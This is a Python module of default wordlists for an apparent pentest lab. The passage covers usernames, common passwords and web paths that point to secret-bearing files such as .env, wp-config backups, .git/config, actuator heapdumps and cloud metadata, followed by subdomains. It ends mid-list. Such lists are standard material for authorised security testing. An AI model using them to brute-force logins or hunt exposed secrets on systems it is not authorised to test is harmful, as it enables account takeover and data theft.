"""Built-in wordlists for the pentest lab.

These lists are intentionally large and comprehensive for realistic
security-testing scenarios.  They are used as defaults when the caller
does not supply a custom wordlist.

Usage is strictly limited to networks owned by the operator.
"""

from __future__ import annotations

# ---------------------------------------------------------------------------
# USERNAMES  (200+ entries)
# ---------------------------------------------------------------------------
USERNAMES: list[str] = [
    # System / default accounts
    "admin",
    "root",
    "user",
    "test",
    "guest",
    "info",
    "administrator",
    "sysadmin",
    "superadmin",
    "super",
    "master",
    "manager",
    "operator",
    "supervisor",
    "support",
    "webmaster",
    "postmaster",
    "hostmaster",
    "abuse",
    "noc",
    "security",
    "devops",
    "sre",
    # Linux / Unix daemons & service accounts
    "www-data",
    "apache",
    "nginx",
    "http",
    "httpd",
    "www",
    "proxy",
    "squid",
    "daemon",
    "bin",
    "sys",
    "system",
    "nobody",
    "nogroup",
    "mail",
    "postfix",
    "dovecot",
    "cyrus",
    "exim",
    "ftp",
    "ftpuser",
    "anonymous",
    "ssh",
    "sshd",
    "git",
    "svn",
    "hg",
    "mercurial",
    "mysql",
    "postgres",
    "postgresql",
    "oracle",
    "mssql",
    "sa",
    "dba",
    "mongo",
    "mongodb",
    "couchdb",
    "couchbase",
    "neo4j",
    "cassandra",
    "redis",
    "memcache",
    "memcached",
    "elastic",
    "elasticsearch",
    "kibana",
    "logstash",
    "grafana",
    "prometheus",
    "influxdb",
    "telegraf",
    "named",
    "bind",
    "dns",
    "dhcp",
    "dhcpd",
    "ntp",
    "snmp",
    "nagios",
    "zabbix",
    "icinga",
    "cacti",
    "mrtg",
    "munin",
    "backup",
    "backuppc",
    "bacula",
    "rsync",
    "service",
    "services",
    "svc",
    "nfs",
    "rpc",
    "rpcuser",
    "nfsnobody",
    "lp",
    "print",
    "cups",
    # Cloud / virtualisation
    "ec2-user",
    "ubuntu",
    "centos",
    "fedora",
    "debian",
    "alpine",
    "core",
    "coreos",
    "rancher",
    "docker",
    "dockerroot",
    "vagrant",
    "packer",
    "terraform",
    "azureuser",
    "bitnami",
    "opc",
    "gce",
    "cloud-user",
    "pi",
    "raspberrypi",
    # CI / CD & DevOps tools
    "jenkins",
    "hudson",
    "bamboo",
    "travis",
    "circleci",
    "drone",
    "gitlab",
    "gitlab-runner",
    "github",
    "bitbucket",
    "ansible",
    "puppet",
    "chef",
    "salt",
    "saltstack",
    "consul",
    "vault",
    "nomad",
    "kubernetes",
    "k8s",
    "kube",
    "helm",
    "argocd",
    "flux",
    # Application servers
    "tomcat",
    "jboss",
    "wildfly",
    "glassfish",
    "weblogic",
    "websphere",
    "jetty",
    "resin",
    "zope",
    "plone",
    # CMS & web apps
    "wordpress",
    "wp",
    "drupal",
    "joomla",
    "magento",
    "moodle",
    "mediawiki",
    "ghost",
    "strapi",
    # Developer / build
    "developer",
    "dev",
    "deploy",
    "deployer",
    "release",
    "build",
    "ci",
    "cd",
    "staging",
    "production",
    "qa",
    "tester",
    "demo",
    "sandbox",
    "lab",
    "training",
    # Pentest / security
    "pentest",
    "pentester",
    "redteam",
    "blueteam",
    "soc",
    "siem",
    "analyst",
    "auditor",
    "compliance",
    "scanner",
    "nessus",
    "qualys",
    "burp",
    # Corporate roles
    "hr",
    "finance",
    "marketing",
    "sales",
    "legal",
    "ceo",
    "cto",
    "cfo",
    "ciso",
    "coo",
    "cmo",
    "vp",
    "director",
    "president",
    "chairman",
    "intern",
    "contractor",
    "vendor",
    "partner",
    "client",
    "customer",
    # Misc / generic
    "public",
    "private",
    "internal",
    "external",
    "api",
    "app",
    "web",
    "mobile",
    "desktop",
    "iot",
    "embedded",
    "firmware",
    "bios",
    "uefi",
    "grub",
    "boot",
    "recovery",
    "rescue",
    "maintenance",
    "monitor",
    "monitoring",
    "status",
    "health",
    "proxy",
    "gateway",
    "router",
    "switch",
    "firewall",
    "vpn",
    "ldap",
    "ad",
    "krbtgt",
    "exchange",
    "sharepoint",
    "teams",
    "outlook",
    "o365",
    "fax",
    "voip",
    "pbx",
    "asterisk",
    "freepbx",
    "student",
    "teacher",
    "professor",
    "faculty",
    "staff",
    "alumni",
    "applicant",
    "candidate",
    "temp",
    "tmp",
    "default",
    "setup",
    "install",
    "oracle",
    "sap",
    "erp",
    "crm",
    "splunk",
    "datadog",
    "newrelic",
    "dynatrace",
    "confluence",
    "jira",
    "trello",
    "slack",
    "testuser",
    "testadmin",
    "testmanager",
    "user1",
    "user2",
    "user3",
    "admin1",
    "admin2",
    "dbadmin",
    "netadmin",
    "sysop",
    "webadmin",
    "ftpadmin",
    "mailadmin",
    "secadmin",
    "john",
    "jane",
    "bob",
    "alice",
    "eve",
    "charlie",
    "dave",
    "michael",
    "james",
    "robert",
    "david",
    "william",
    "mary",
    "jennifer",
    "linda",
    "patricia",
    "elizabeth",
]

# ---------------------------------------------------------------------------
# PASSWORDS  (500+ entries)
# ---------------------------------------------------------------------------
PASSWORDS: list[str] = [
    # --- Top common passwords ---
    "123456",
    "password",
    "12345678",
    "qwerty",
    "abc123",
    "monkey",
    "master",
    "dragon",
    "111111",
    "baseball",
    "iloveyou",
    "trustno1",
    "sunshine",
    "princess",
    "football",
    "charlie",
    "shadow",
    "michael",
    "login",
    "letmein",
    "welcome",
    "123456789",
    "1234567890",
    "1234567",
    "12345",
    "1234",
    "123",
    "000000",
    "654321",
    "superman",
    "batman",
    "access",
    "hello",
    "qazwsx",
    "passw0rd",
    "starwars",
    "whatever",
    "soccer",
    "jordan",
    "harley",
    "hunter",
    "ranger",
    "buster",
    "thomas",
    "robert",
    "hockey",
    "george",
    "andrew",
    "charlie",
    "daniel",
    "joshua",
    "pepper",
    "ginger",
    "killer",
    "maggie",
    "jessica",
    "ashley",
    "jennifer",
    "nicole",
    "amanda",
    "summer",
    "flower",
    "cheese",
    "banana",
    "matrix",
    "freedom",
    "secret",
    "computer",
    "mustang",
    "corvette",
    "ferrari",
    "mercedes",
    "porsche",
    "dallas",
    "yankees",
    "eagles",
    "steelers",
    "cowboys",
    "arsenal",
    "liverpool",
    "chelsea",
    "barcelona",
    "madrid",
    "juventus",
    "lakers",
    "basketball",
    "tennis",
    "golf",
    "cricket",
    "hockey1",
    "soccer1",
    "baseball1",
    "football1",
    "password1",
    "password2",
    "password3",
    "password12",
    "password123",
    "qwerty123",
    "abc1234",
    "abcdef",
    "abcdefg",
    "abcd1234",
    "administrator",
    "admin123",
    "admin1234",
    "admin12345",
    "admin1",
    "root123",
    "root1234",
    "root",
    "toor",
    "test",
    "test123",
    "test1234",
    "testing",
    "testing123",
    "guest",
    "guest123",
    "default",
    "changeme",
    "changeme123",
    "pass",
    "pass123",
    "pass1234",
    "passwd",
    "p@ss",
    "letmein123",
    "welcome1",
    "welcome123",
    # --- Patterns with special characters ---
    "P@ssw0rd",
    "P@ssword1",
    "P@ssword123",
    "P@$$w0rd",
    "P@$$word1",
    "p@ssw0rd",
    "p@ssword1",
    "p@ssword123",
    "Passw0rd!",
    "Password1!",
    "Password123!",
    "Password!",
    "Admin123!",
    "Admin@123",
    "Admin!123",
    "admin@123",
    "admin!123",
    "Root123!",
    "Root@123",
    "root@123",
    "Test1234!",
    "Test@1234",
    "test@1234",
    "Welcome1!",
    "Welcome123!",
    "Welcome@1",
    "Changeme1!",
    "Changeme!",
    "Letmein1!",
    "Letmein!",
    "Qwerty123!",
    "Qwerty1!",
    "qwerty!",
    "Qwerty!",
    "Monkey123!",
    "Dragon123!",
    "Master123!",
    "Server1",
    "Server123",
    "Server!",
    "server1",
    "Service1",
    "Service123",
    "service1",
    "Supervisor1",
    "Supervisor!",
    "supervisor1",
    "Support1",
    "Support123",
    "support1",
    "Secret123",
    "Secret!",
    "secret1",
    "Security1",
    "Security!",
    "security1",
    "System1",
    "System123",
    "system1",
    "Network1",
    "Network!",
    "network1",
    "Database1",
    "Database!",
    "database1",
    "Company1",
    "Company123",
    "company1",
    "Corporate1",
    "Corporate!",
    "corporate1",
    "Office365",
    "Office365!",
    "o365password",
    "Azure123!",
    "Aws123!",
    "Cloud123!",
    "Google123!",
    # --- Keyboard walks ---
    "qwertyuiop",
    "asdfghjkl",
    "zxcvbnm",
    "1qaz2wsx",
    "2wsx3edc",
    "3edc4rfv",
    "qazwsxedc",
    "1q2w3e4r",
    "1q2w3e4r5t",
    "1q2w3e",
    "zaq1xsw2",
    "!@#$%^&*",
    "!@#$%^&*()",
    "1qaz!QAZ",
    "qweasdzxc",
    "q1w2e3r4",
    "1234qwer",
    "qwer1234",
    "asdf1234",
    "zxcv1234",
    "asdfjkl;",
    "poiuytrewq",
    "mnbvcxz",
    "lkjhgfdsa",
    "0987654321",
    "9876543210",
    # --- Year-based passwords ---
    "password2020",
    "password2021",
    "password2022",
    "password2023",
    "password2024",
    "password2025",
    "password2026",
    "admin2020",
    "admin2021",
    "admin2022",
    "admin2023",
    "admin2024",
    "admin2025",
    "admin2026",
    "welcome2020",
    "welcome2021",
    "welcome2022",
    "welcome2023",
    "welcome2024",
    "welcome2025",
    "welcome2026",
    "changeme2024",
    "changeme2025",
    "changeme2026",
    "test2024",
    "test2025",
    "test2026",
    "user2024",
    "user2025",
    "user2026",
    "pass2024",
    "pass2025",
    "pass2026",
    "P@ssw0rd2024",
    "P@ssw0rd2025",
    "P@ssw0rd2026",
    "Password2024!",
    "Password2025!",
    "Password2026!",
    # --- Season-based passwords ---
    "Summer2020!",
    "Summer2021!",
    "Summer2022!",
    "Summer2023!",
    "Summer2024!",
    "Summer2025!",
    "Summer2026!",
    "Winter2020!",
    "Winter2021!",
    "Winter2022!",
    "Winter2023!",
    "Winter2024!",
    "Winter2025!",
    "Winter2026!",
    "Spring2020!",
    "Spring2021!",
    "Spring2022!",
    "Spring2023!",
    "Spring2024!",
    "Spring2025!",
    "Spring2026!",
    "Fall2020!",
    "Fall2021!",
    "Fall2022!",
    "Fall2023!",
    "Fall2024!",
    "Fall2025!",
    "Fall2026!",
    "Autumn2024!",
    "Autumn2025!",
    "Autumn2026!",
    "summer2024",
    "winter2024",
    "spring2024",
    "fall2024",
    "summer2025",
    "winter2025",
    "spring2025",
    "fall2025",
    "Summer24!",
    "Winter24!",
    "Spring24!",
    "Fall24!",
    "Summer25!",
    "Winter25!",
    "Spring25!",
    "Fall25!",
    # --- Month-based ---
    "January2024!",
    "February2024!",
    "March2024!",
    "April2024!",
    "May2024!",
    "June2024!",
    "July2024!",
    "August2024!",
    "September2024!",
    "October2024!",
    "November2024!",
    "December2024!",
    "January2025!",
    "February2025!",
    "March2025!",
    "April2025!",
    "May2025!",
    "June2025!",
    "July2025!",
    "August2025!",
    "September2025!",
    "October2025!",
    "November2025!",
    "December2025!",
    # --- Leet speak variants ---
    "p4ssw0rd",
    "p455w0rd",
    "4dm1n",
    "4dm1n123",
    "r00t",
    "r00t123",
    "t3st",
    "t3st123",
    "l3tm31n",
    "w3lc0m3",
    "s3cur1ty",
    "s3cr3t",
    "h4ck3r",
    "h4x0r",
    "pwn3d",
    "3l1t3",
    "m4st3r",
    "dr4g0n",
    "sh4d0w",
    "m0nk3y",
    # --- Company / environment patterns ---
    "Company123",
    "Company2024",
    "Company2025",
    "Company!",
    "Companyname1",
    "Corp123",
    "Corp2024",
    "Corp!",
    "Enterprise1",
    "Enterprise!",
    "Org123",
    "Org2024",
    "Prod123",
    "Staging123",
    "Dev123",
    "Test123",
    "prod2024",
    "staging2024",
    "dev2024",
    # --- Common service passwords ---
    "mysql",
    "postgres",
    "oracle",
    "mssql",
    "redis",
    "mongo",
    "mongodb",
    "memcached",
    "rabbit",
    "rabbitmq",
    "kafka",
    "elastic",
    "elasticsearch",
    "grafana",
    "zabbix",
    "nagios",
    "jenkins",
    "ansible",
    "vagrant",
    "docker",
    "kubernetes",
    "cisco",
    "juniper",
    "arista",
    "paloalto",
    # --- PIN codes ---
    "0000",
    "1111",
    "2222",
    "3333",
    "4444",
    "5555",
    "6666",
    "7777",
    "8888",
    "9999",
    "1234",
    "4321",
    "1122",
    "2233",
    "1212",
    "6969",
    "1313",
    "7474",
    "2580",
    "0852",
    "1357",
    "2468",
    "3691",
    "1470",
    "9630",
    # --- Short common ---
    "god",
    "sex",
    "love",
    "war",
    "paz",
    "sky",
    "ice",
    "fire",
    "rock",
    "star",
    "moon",
    "sun",
    "king",
    "queen",
    "hack",
    "pwn",
    "own",
    "win",
    "top",
    "best",
    # --- Extra common passwords (filling to 500+) ---
    "internet",
    "service",
    "canada",
    "texas",
    "florida",
    "orange",
    "apple",
    "purple",
    "diamond",
    "gold",
    "silver",
    "platinum",
    "thunder",
    "lightning",
    "storm",
    "hurricane",
    "tornado",
    "blizzard",
    "avalanche",
    "tsunami",
    "sparky",
    "snoopy",
    "buddy",
    "bailey",
    "max",
    "lucky",
    "angel",
    "princess1",
    "butterfly",
    "dolphin",
    "tigers",
    "lions",
    "bears",
    "wolves",
    "panthers",
    "falcon",
    "hawk",
    "eagle",
    "raven",
    "phoenix",
    "samurai",
    "ninja",
    "warrior",
    "knight",
    "paladin",
    "wizard",
    "mage",
    "sorcerer",
    "dragon1",
    "castle",
    "kingdom",
    "empire",
    "republic",
    "nation",
    "alliance",
    "matrix1",
    "neo",
    "morpheus",
    "trinity",
    "oracle1",
    "gandalf",
    "frodo",
    "aragorn",
    "legolas",
    "gimli",
    "picard",
    "kirk",
    "spock",
    "scotty",
    "data",
    "skywalker",
    "vader",
    "yoda",
    "obiwan",
    "anakin",
    "groot",
    "thanos",
    "stark",
    "banner",
    "rogers",
    "panther",
    "spider",
    "wolverine",
    "cyclops",
    "magneto",
    "Pa55w0rd",
    "Pa55word!",
    "P@55w0rd!",
    "Pa$$w0rd!",
    "Tr0ub4dor&3",
    "correct horse battery staple",
    "!QAZ2wsx",
    "ZAQ!2wsx",
    "1qazZAQ!",
    "qwerty1",
    "asdfgh",
    "zxcvbn",
    "1q2w3e",
    "password!",
    "123abc",
    "abc123!",
    "xyz789",
    "aaa111",
    "aaa123",
    "zzz999",
    "xxx666",
    "iloveu",
    "love123",
    "sexy",
    "baby",
    "honey",
    "sweetheart",
    "darling",
    "angel1",
    "babe",
    "fuckyou",
    "asshole",
    "biteme",
    "dickhead",
    "midnight",
    "sunshine1",
    "rainbow",
    "cookie",
    "chocolate",
    "vanilla",
    "strawberry",
    "caramel",
    "espresso",
    "coffee",
    "beer",
    "wine",
    "vodka",
    "whiskey",
    "tequila",
    "rum123",
    "bourbon",
    "guitar",
    "piano",
    "drums",
    "music",
    "rock123",
    "metal",
    "punk",
    "jazz",
    "blues",
    "country",
]

# ---------------------------------------------------------------------------
# DIRECTORIES  (500+ entries)
# ---------------------------------------------------------------------------
DIRECTORIES: list[str] = [
    # --- Admin panels ---
    "",
    "admin",
    "administrator",
    "admin.php",
    "admin.html",
    "admin/login",
    "admin/index",
    "admin/dashboard",
    "wp-admin",
    "wp-login.php",
    "wp-admin/install.php",
    "manager",
    "manager/html",
    "manager/status",
    "phpmyadmin",
    "pma",
    "myadmin",
    "mysqladmin",
    "adminer",
    "adminer.php",
    "cpanel",
    "whm",
    "webmail",
    "plesk",
    "directadmin",
    "ispconfig",
    "webmin",
    "dashboard",
    "panel",
    "controlpanel",
    "control",
    "console",
    "portal",
    "gateway",
    "cockpit",
    "heimdall",
    "organizr",
    "nagios",
    "zabbix",
    "grafana",
    "kibana",
    "prometheus",
    "jenkins",
    "hudson",
    "bamboo",
    "travis",
    "gitlab",
    "gitea",
    "gogs",
    "roundcube",
    "squirrelmail",
    "horde",
    "zimbra",
    "sysadmin",
    "management",
    "backend",
    "backoffice",
    # --- API paths ---
    "api",
    "api/v1",
    "api/v2",
    "api/v3",
    "api/v4",
    "api/latest",
    "api/internal",
    "api/private",
    "api/public",
    "api/health",
    "api/status",
    "api/info",
    "api/version",
    "api/auth",
    "api/login",
    "api/token",
    "api/users",
    "api/admin",
    "api/config",
    "api/settings",
    "graphql",
    "graphql/console",
    "graphiql",
    "rest",
    "restapi",
    "soap",
    "wsdl",
    "swagger",
    "swagger-ui",
    "swagger-ui.html",
    "swagger.json",
    "swagger.yaml",
    "api-docs",
    "apidocs",
    "api-doc",
    "openapi.json",
    "openapi.yaml",
    "openapi",
    "redoc",
    "rapidoc",
    "v1",
    "v2",
    "v3",
    "jsonapi",
    "odata",
    # --- Config / sensitive files ---
    ".env",
    ".env.local",
    ".env.production",
    ".env.staging",
    ".env.development",
    ".env.backup",
    ".env.bak",
    ".env.old",
    ".env.save",
    ".env.swp",
    "config.php",
    "config.inc.php",
    "config.yml",
    "config.yaml",
    "config.json",
    "config.xml",
    "config.ini",
    "config.toml",
    "config.bak",
    "configuration.php",
    "settings.php",
    "settings.py",
    "settings.json",
    "local_settings.py",
    "localsettings.php",
    "web.config",
    "Web.config",
    "applicationContext.xml",
    "application.properties",
    "application.yml",
    "appsettings.json",
    "appsettings.Development.json",
    "database.yml",
    "database.php",
    "db.php",
    "db.inc",
    "wp-config.php",
    "wp-config.php.bak",
    "wp-config.php.old",
    "wp-config.php.save",
    "wp-config.php.swp",
    "wp-config.php~",
    ".htaccess",
    ".htpasswd",
    ".htaccess.bak",
    "robots.txt",
    "sitemap.xml",
    "sitemap_index.xml",
    "crossdomain.xml",
    "clientaccesspolicy.xml",
    "security.txt",
    ".well-known/security.txt",
    "humans.txt",
    "ads.txt",
    "app-ads.txt",
    # --- Version control ---
    ".git",
    ".git/config",
    ".git/HEAD",
    ".git/index",
    ".git/logs/HEAD",
    ".git/refs",
    ".gitignore",
    ".gitattributes",
    ".gitmodules",
    ".svn",
    ".svn/entries",
    ".svn/wc.db",
    ".hg",
    ".hgignore",
    ".bzr",
    # --- Backup / archive files ---
    "backup",
    "backups",
    "backup.zip",
    "backup.tar.gz",
    "backup.tgz",
    "backup.sql",
    "backup.sql.gz",
    "backup.rar",
    "backup.7z",
    "db.sql",
    "db.sql.gz",
    "db.sql.bak",
    "dump.sql",
    "dump.sql.gz",
    "database.sql",
    "database.sql.gz",
    "database.bak",
    "site.zip",
    "site.tar.gz",
    "www.zip",
    "html.zip",
    "web.zip",
    "old",
    "old.zip",
    "archive",
    "archive.zip",
    "bak",
    "copy",
    "temp",
    "tmp",
    "data.sql",
    "export.sql",
    "mysql.sql",
    "postgres.sql",
    ".bak",
    "_.bak",
    "backup1",
    "backup2",
    "db_backup",
    "full-backup",
    "daily-backup",
    # --- Dev / debug files ---
    "debug",
    "debug.log",
    "debug.php",
    "test",
    "test.php",
    "test.html",
    "testing",
    "staging",
    "dev",
    "development",
    "phpinfo.php",
    "phpinfo",
    "info.php",
    "pi.php",
    "server-info",
    "server-status",
    "elmah.axd",
    "trace.axd",
    "debug/default/view",
    "_debugbar",
    "_profiler",
    "profiler",
    "telescope",
    "horizon",
    "nova",
    "error_log",
    "error.log",
    "errors.log",
    "debug.log",
    "access.log",
    "access_log",
    "install",
    "install.php",
    "setup",
    "setup.php",
    "update",
    "upgrade",
    # --- Common frameworks ---
    "wp-content",
    "wp-includes",
    "wp-json",
    "wp-json/wp/v2/users",
    "xmlrpc.php",
    "wp-cron.php",
    "wp-signup.php",
    "wp-trackback.php",
    "wp-content/uploads",
    "wp-content/plugins",
    "wp-content/themes",
    "wp-content/debug.log",
    "joomla",
    "joomla/administrator",
    "drupal",
    "drupal/admin",
    "user/login",
    "magento",
    "magento/admin",
    "index.php/admin",
    "typo3",
    "typo3/install",
    "typo3conf",
    "moodle",
    "moodle/admin",
    "mediawiki",
    "wiki",
    "laravel",
    "laravel/public",
    "symfony",
    "symfony/public",
    "_wdt",
    "_profiler",
    "django",
    "django/admin",
    "flask",
    "express",
    "spring",
    "struts",
    "struts2",
    "rails",
    "rails/info/routes",
    "artisan",
    "tinker",
    # --- IDE / editor files ---
    ".idea",
    ".idea/workspace.xml",
    ".vscode",
    ".vscode/settings.json",
    ".vscode/launch.json",
    ".project",
    ".classpath",
    ".settings",
    "nbproject",
    ".netbeans",
    ".DS_Store",
    "Thumbs.db",
    "desktop.ini",
    # --- Package managers ---
    "node_modules",
    "node_modules/.package-lock.json",
    "vendor",
    "vendor/autoload.php",
    "composer.json",
    "composer.lock",
    "package.json",
    "package-lock.json",
    "yarn.lock",
    "Gemfile",
    "Gemfile.lock",
    "requirements.txt",
    "Pipfile",
    "Pipfile.lock",
    "poetry.lock",
    "go.mod",
    "go.sum",
    "Cargo.toml",
    "Cargo.lock",
    "pom.xml",
    "build.gradle",
    "build.sbt",
    "Makefile",
    "Dockerfile",
    "docker-compose.yml",
    "docker-compose.yaml",
    ".dockerignore",
    "Vagrantfile",
    "Procfile",
    # --- Common web paths ---
    "uploads",
    "upload",
    "files",
    "documents",
    "media",
    "images",
    "img",
    "pics",
    "photos",
    "screenshots",
    "static",
    "assets",
    "public",
    "dist",
    "build",
    "css",
    "js",
    "javascript",
    "fonts",
    "icons",
    "themes",
    "templates",
    "views",
    "layouts",
    "cgi-bin",
    "cgi",
    "bin",
    "scripts",
    "includes",
    "inc",
    "lib",
    "libs",
    "library",
    "modules",
    "plugins",
    "extensions",
    "components",
    "widgets",
    "helpers",
    "cache",
    "cached",
    "tmp",
    "temp",
    "logs",
    "log",
    # --- Auth paths ---
    "login",
    "signin",
    "sign-in",
    "auth",
    "authenticate",
    "logout",
    "signout",
    "sign-out",
    "register",
    "signup",
    "sign-up",
    "join",
    "forgot",
    "forgot-password",
    "reset-password",
    "change-password",
    "oauth",
    "oauth2",
    "oauth/authorize",
    "oauth/token",
    "saml",
    "saml/login",
    "saml/metadata",
    "sso",
    "sso/login",
    "cas",
    "cas/login",
    ".well-known/openid-configuration",
    "token",
    "session",
    "sessions",
    "2fa",
    "mfa",
    "otp",
    "totp",
    # --- User / account paths ---
    "user",
    "users",
    "account",
    "accounts",
    "profile",
    "profiles",
    "me",
    "my",
    "myaccount",
    "my-account",
    "settings",
    "preferences",
    "notifications",
    "members",
    "member",
    "people",
    "contacts",
    # --- Data / content ---
    "search",
    "find",
    "query",
    "download",
    "downloads",
    "export",
    "exports",
    "import",
    "imports",
    "report",
    "reports",
    "analytics",
    "stats",
    "statistics",
    "feed",
    "feeds",
    "rss",
    "atom",
    "sitemap",
    "blog",
    "news",
    "articles",
    "posts",
    "page",
    "pages",
    "forum",
    "forums",
    "community",
    "discussions",
    "shop",
    "store",
    "cart",
    "checkout",
    "products",
    "catalog",
    "order",
    "orders",
    "invoice",
    "invoices",
    "payment",
    "payments",
    # --- Server management ---
    "status",
    "health",
    "healthcheck",
    "health-check",
    "ping",
    "heartbeat",
    "ready",
    "readiness",
    "liveness",
    "metrics",
    "monitor",
    "monitoring",
    "actuator",
    "actuator/health",
    "actuator/info",
    "actuator/env",
    "actuator/beans",
    "actuator/mappings",
    "actuator/configprops",
    "actuator/metrics",
    "actuator/loggers",
    "actuator/heapdump",
    "actuator/threaddump",
    "actuator/trace",
    "actuator/httptrace",
    "actuator/shutdown",
    "actuator/jolokia",
    "actuator/auditevents",
    "info",
    "version",
    "about",
    "env",
    "environment",
    # --- Spring Boot ---
    "jolokia",
    "jolokia/list",
    "heapdump",
    "threaddump",
    "logfile",
    "mappings",
    "beans",
    "autoconfig",
    "configprops",
    "auditevents",
    "flyway",
    "liquidbase",
    "loggers",
    # --- Cloud metadata ---
    "latest/meta-data",
    "latest/user-data",
    "metadata",
    "computeMetadata/v1",
    "openstack/latest/meta_data.json",
    # --- Documentation ---
    "readme",
    "README",
    "README.md",
    "README.txt",
    "CHANGELOG",
    "CHANGELOG.md",
    "LICENSE",
    "LICENSE.txt",
    "doc",
    "docs",
    "documentation",
    "help",
    "faq",
    "wiki",
    "knowledge",
    "kb",
    # --- Misc ---
    "cron",
    "crontab",
    "jobs",
    "tasks",
    "queue",
    "queues",
    "socket",
    "websocket",
    "ws",
    "wss",
    "mail",
    "email",
    "smtp",
    "imap",
    "pop3",
    "ftp",
    "sftp",
    "ssh",
    "database",
    "db",
    "sql",
    "data",
    "server",
    "cluster",
    "node",
    "nodes",
    "proxy",
    "reverse-proxy",
    "load-balancer",
    "cdn",
    "edge",
    "origin",
    "internal",
    "external",
    "private",
    "public",
    "sandbox",
    "demo",
    "sample",
    "example",
    "examples",
    "favicon.ico",
    "manifest.json",
    "service-worker.js",
    "sw.js",
    "browserconfig.xml",
    "apple-touch-icon.png",
    ".well-known",
    ".well-known/acme-challenge",
    ".well-known/change-password",
    ".well-known/host-meta",
    ".well-known/nodeinfo",
    ".well-known/webfinger",
]

# ---------------------------------------------------------------------------
# SUBDOMAINS  (300+ entries)
# ---------------------------------------------------------------------------
SUBDOMAINS: list[str] = [
    # --- Core infrastructure ---
    "www",
    "www2",
    "www3",
    "mail",
    "mail2",
    "email",
    "smtp",
    "pop",
    "pop3",
    "imap",
    "webmail",
    "mx",
    "mx1",
    "mx2",
    "mx3",
    "ns",
    "ns1",
    "ns2",
    "ns3",
    "ns4",
    "dns",
    "dns1",
    "dns2",
    "ftp",
    "sftp",
    "ftps",
    # --- Network ---
    "vpn",
    "vpn1",
    "vpn2",
    "remote",
    "access",
    "gateway",
    "gw",
    "gw1",
    "proxy",
    "proxy1",
    "proxy2",
    "cdn",
    "cdn1",
    "cdn2",
    "edge",
    "edge1",
    "firewall",
    "fw",
    "fw1",
    "router",
    "switch",
    "core",
    "lb",
    "loadbalancer",
    "load-balancer",
    "nat",
    "waf",
    # --- API & applications ---
    "api",
    "api1",
    "api2",
    "api-v1",
    "api-v2",
    "app",
    "app1",
    "app2",
    "apps",
    "web",
    "web1",
    "web2",
    "mobile",
    "m",
    "mobile-api",
    "ws",
    "websocket",
    "socket",
    "graphql",
    "rest",
    "portal",
    "portal2",
    "service",
    "services",
    "svc",
    "microservice",
    "ms",
    # --- Development & staging ---
    "dev",
    "dev1",
    "dev2",
    "dev3",
    "staging",
    "stage",
    "stg",
    "test",
    "testing",
    "test1",
    "test2",
    "qa",
    "qa1",
    "qa2",
    "uat",
    "beta",
    "alpha",
    "canary",
    "nightly",
    "demo",
    "demo1",
    "demo2",
    "sandbox",
    "sandbox1",
    "lab",
    "labs",
    "preview",
    "pre",
    "preprod",
    "pre-production",
    "rc",
    "release",
    # --- Internal / corporate ---
    "internal",
    "intranet",
    "extranet",
    "corp",
    "corporate",
    "local",
    "localhost",
    "office",
    "hq",
    "share",
    "sharepoint",
    "sp",
    "teams",
    "meet",
    "zoom",
    "conference",
    # --- Admin & management ---
    "admin",
    "admin1",
    "admin2",
    "manage",
    "management",
    "mgmt",
    "panel",
    "cpanel",
    "whm",
    "control",
    "console",
    "dashboard",
    "dash",
    "monitor",
    "monitoring",
    "mon",
    "status",
    "health",
    "uptime",
    "metrics",
    "stats",
    "analytics",
    # --- CI/CD & DevOps ---
    "jenkins",
    "jenkins1",
    "gitlab",
    "github",
    "bitbucket",
    "git",
    "ci",
    "cd",
    "cicd",
    "build",
    "builder",
    "deploy",
    "deployer",
    "deployment",
    "release",
    "releases",
    "registry",
    "docker",
    "container",
    "containers",
    "k8s",
    "kubernetes",
    "kube",
    "rancher",
    "openshift",
    "argo",
    "argocd",
    "flux",
    "terraform",
    "tf",
    "ansible",
    "puppet",
    "chef",
    "salt",
    "consul",
    "vault",
    "nomad",
    "harbor",
    "nexus",
    "artifactory",
    # --- Monitoring & observability ---
    "grafana",
    "kibana",
    "prometheus",
    "alertmanager",
    "alerts",
    "elasticsearch",
    "elastic",
    "es",
    "logstash",
    "fluentd",
    "graylog",
    "nagios",
    "zabbix",
    "icinga",
    "cacti",
    "datadog",
    "newrelic",
    "splunk",
    "sentry",
    "pagerduty",
    "opsgenie",
    "jaeger",
    "zipkin",
    "tempo",
    "loki",
    "mimir",
    "thanos",
    # --- Databases ---
    "db",
    "db1",
    "db2",
    "db3",
    "database",
    "data",
    "sql",
    "mysql",
    "mariadb",
    "postgres",
    "postgresql",
    "pg",
    "mongo",
    "mongodb",
    "redis",
    "redis1",
    "elastic",
    "elasticsearch",
    "cassandra",
    "cass",
    "neo4j",
    "graph",
    "couchdb",
    "couchbase",
    "influxdb",
    "timescale",
    "memcache",
    "memcached",
    "cache",
    "cache1",
    # --- Message queues ---
    "rabbit",
    "rabbitmq",
    "mq",
    "kafka",
    "kafka1",
    "activemq",
    "amq",
    "nats",
    "pulsar",
    "queue",
    "broker",
    # --- Auth & identity ---
    "sso",
    "auth",
    "login",
    "id",
    "identity",
    "oauth",
    "saml",
    "ldap",
    "ad",
    "dc",
    "dc1",
    "dc2",
    "kerberos",
    "krb",
    "cas",
    "keycloak",
    "okta",
    "auth0",
    "radius",
    "tacacs",
    # --- Mail & comms ---
    "exchange",
    "owa",
    "autodiscover",
    "outlook",
    "o365",
    "spam",
    "antispam",
    "chat",
    "im",
    "irc",
    "xmpp",
    "jabber",
    "slack",
    "mattermost",
    "rocket",
    "voip",
    "sip",
    "pbx",
    "asterisk",
    "phone",
    # --- Hosting & web panels ---
    "cpanel",
    "whm",
    "plesk",
    "directadmin",
    "da",
    "ispconfig",
    "webmin",
    "phpmyadmin",
    "adminer",
    "pgadmin",
    # --- Storage ---
    "storage",
    "store",
    "files",
    "file",
    "media",
    "images",
    "img",
    "assets",
    "static",
    "upload",
    "uploads",
    "dl",
    "download",
    "downloads",
    "backup",
    "backups",
    "bak",
    "s3",
    "minio",
    "swift",
    "blob",
    "nfs",
    "nas",
    "san",
    "ceph",
    "ftp",
    "sftp",
    # --- CMS & web apps ---
    "blog",
    "blogs",
    "wordpress",
    "wp",
    "cms",
    "content",
    "forum",
    "forums",
    "community",
    "wiki",
    "docs",
    "documentation",
    "doc",
    "help",
    "support",
    "helpdesk",
    "desk",
    "ticket",
    "tickets",
    "jira",
    "confluence",
    "wiki2",
    "crm",
    "erp",
    "sap",
    "salesforce",
    "shop",
    "store",
    "ecommerce",
    "commerce",
    "booking",
    "reservation",
    # --- Security ---
    "waf",
    "ids",
    "ips",
    "siem",
    "soc",
    "security",
    "scan",
    "scanner",
